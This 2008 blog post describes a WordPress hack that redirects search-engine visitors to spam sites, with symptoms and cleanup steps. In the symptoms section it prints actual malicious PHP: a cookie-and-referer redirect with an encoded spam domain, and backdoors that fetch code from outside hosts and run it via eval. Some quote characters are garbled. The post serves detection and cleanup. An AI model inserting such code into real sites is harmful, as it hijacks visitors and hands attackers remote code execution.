WordPress Hack: Recover and Fix Google and Search Engine or No Cookie Traffic Redirected to Your-Needs.info, AnyResults.Net, Golden-Info.net and Other Illegal Sites

Hackers are going all out to hack and exploit WordPress blogs hosted all over the web, planting and injecting malicious code into WordPress codes and database in order to redirect visitors and hits from Google and other search engines to spam sites such as your-needs.info, anyresults.net, golden-info.net, keymachine.de, beliy.us, seogoogle.us and many other spam sites that filled with pay-per-click CPC ads. Some hack appears to target bigger crowd by redirecting all without WordPress cookie. Without been hacked, these traffic supposedly to arrive at the blog as destination.

Symptoms of the Search Engine Redirection Hack

Note that not all symptoms may happen altogether. There may be more than one method of hacks existed, which contributed to different finding and possible resolution.

• Any click through from search engines such as Google, Yahoo, AOL, MSN, Windows Live search results, including blog name, will be redirected and forwarded to hacker’s sites such as your-needs.info, anyresults.net, golden-info.net, keymachine.de, beliy.us, seogoogle.us, with the list sure to grow. Viewer arrives at the hacker page with the same search string that he or she used to search in search engine.
• Click on a link to the blog on RSS feed reader such as Google reader can be redirected to hacker site too.
• A visitor with no account on the blog, or not login (hence does not has cookie detected by malicious code), will be redirected to spam sites.
• Only visits from search engine are been redirected away, and the trick manage to fool around probably a lot of bloggers, webmasters and site owners, or at least delay the detection of the problem.
• Sudden huge and dramatic drop and lose of massive amount of visitors traffic and page views in web tracker statistics, especially traffic with Google as referrer, even though search engine results ranking is intact.
• Massic drop of advertising revenue from Google AdSense or other ads network, or affiliate commissions.
• The following base64 encoded PHP code may appear on the wp-blog-header.php file:

  <?php \
$seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");
$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser="1?; break; }
if($ser=="1? && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>

• An image, which is in fact a bunch of malicious PHP code, was added to the wp-contents/uploads directory. For example, wp-contents/uploads/2008/06/06/abcdefghijklmn.jpg, or it may be inside your theme folder, i.e. wp-contents/themes/classic/images/xyz.jpg. The name of the image may be in the format of xxxxxx_old.jpeg.
• An entry was inserted in MySQL database for WordPress wp_options to activate the image (the malicious PHP code) as a plugin, typically as rss_f541b3abd05e7962fcab37737f40fad8.
• There may be also malicious codes, especially those that interpreted with eval() or base64_decode() command been inserted into other WordPress PHP files. Examples are the following codes:

  if(isset($_GET['p'])) {
$sock = @fsockopen('km20725.keymachine.de', 80);
if($sock){
fwrite ($sock, 'GET http://km20725.keymachine.de/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p'].' HTTP/1.0'."\r\n");
fwrite ($sock, 'Host: km20725.keymachine.de'."\r\n\r\n");
while($content[] = fgets ($sock));
$content = implode('', $content);
@eval(trim(substr($content, strpos($content, "\r\n\r\n"))));
fclose ($sock);}
}

  if(isset($_GET['p'])) { @eval(@file_get_contents('http://beliy.us/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p']));
}

  if(isset($_GET['p'])) { @eval(@file_get_contents('http://seogoogle.us/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p']));
}

  eval(gzinflate(base64_decode(

• WordPress theme that is been activated and used can be injected with hacking code and affected too. Such code normally exists in header.php or index.php of the theme, and has a line similar to the below

  if($ser==”1″ && sizeof($_COOKIE)==0){ header(”Location:

The WordPress search traffic redirect to spam site hack happens probably due to security hole and vulnerability that is not patched when blog owner decides not to upgrade to latest version of WordPress (although some reports that their blogs been hacked even though it’s already on the latest version of WordPress 2.5.1). Whatever the cause, here’s the fix and solution to resolve and defeat the hack to ensure that you own back the traffic and avoid been penalized by Google by unreasonable redirecting to spam pages.

1. Backup the WordPress database.
2. Use phpMyAdmin to browse WordPress MySQL database tables. Go to wp_options table, and then edit the row named active_plugins. The row details all active plugins that has been activated. Go through the list (in a line), and look for an a plugin named ended with an image extension, such as .jpg, .jpeg, .gif and etc. For example, abcdefgh_old.jpeg. Note down the path to the image file.
3. Using sFTP or SSH (forget about FTP or Telnet for security), then navigate to the path of the file, and delete the file.
4. Go to WordPress Administrator Plugins panel, deactivate or activate any plugin to clear off the malicious plugin from the “active_plugins” row.
5. Back to phpMyAdmin, at the wp_options table, find a row that contains the following string as option_name:

   rss_f541b3abd05e7962fcab37737f40fad8

   Delete the row away.

   If you don’t know how to perform the database cleanup detailed in steps above, here’s a video tutorial:

6. Go to wp_users table. If there is a nameless user (null value in user_nicename field) created at 00:00:00 on 0000-00-00, note down the user ID (ID field, a number). Delete the user.
7. Browse the wp_usermeta table. Locate all rows with user_id matches the ID of the deleted illegal user. There are normally three rows been associated to the invader user ID. Delete all the associated rows.
8. Login to the server to edit the theme files, or browse the theme files’ code in Theme Editor of WordPress Administrator Design panel. Check the header.php and index.php for any suspicious code. As mentioned above, look for something similar to the line below:

   if($ser==”1″ && sizeof($_COOKIE)==0){ header(”Location:

   If found, delete and remove the code. Note that the malicious code will be several lines long in total.

9. If it’s not already existed, create an empty index.html file in the wp-contents/plugins directory. The blank index.html hides the contents of the plugins directory, effectively shield what plug-ins been used from hackers to harden and tighten the WordPress security.
10. Upload and replace each and every WordPress files (not only wp-blog-header.php) on the server with the fresh, clean, and original latest version from WordPress (of course, except few files such as wp-config.php and themes). If you’re upgrading, read the guide carefully.
11. Change your password.
12. If you have multiple users, change theirs password (or ask them to change the password) too.

Related Articles

• Integrate and Display Google AdSense for Search and Co-Op Custom Search Engine Results in WordPress Blog Page Template
• Replace Google Blog Search with Technorati for Incoming Links in Dashboard of WordPress
• StatTraq – Wordpress Plugin for Site Statistic and Traffic Counter
• This Site May Harm Your Computer On Every Sites Bug in Google Search Results
• Hack to Search and View Free Live Webcam with Google Search
• Wikiasari – Google Co-op Custom Search Engine, Digg or StumbleUpon for Wikipedia?
• WordPress Plugin: Display Google Analytics and FeedBurner Reports Statistics from Site Admin
• How to Reset WordPress Password to Recover Forgotten Secret
• Full Set of Google Search Engine Holiday Logo Collection (1998 – 2007)

This entry was posted on Tuesday, June 10th, 2008 at 1:03 am and is filed under Weblogs. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.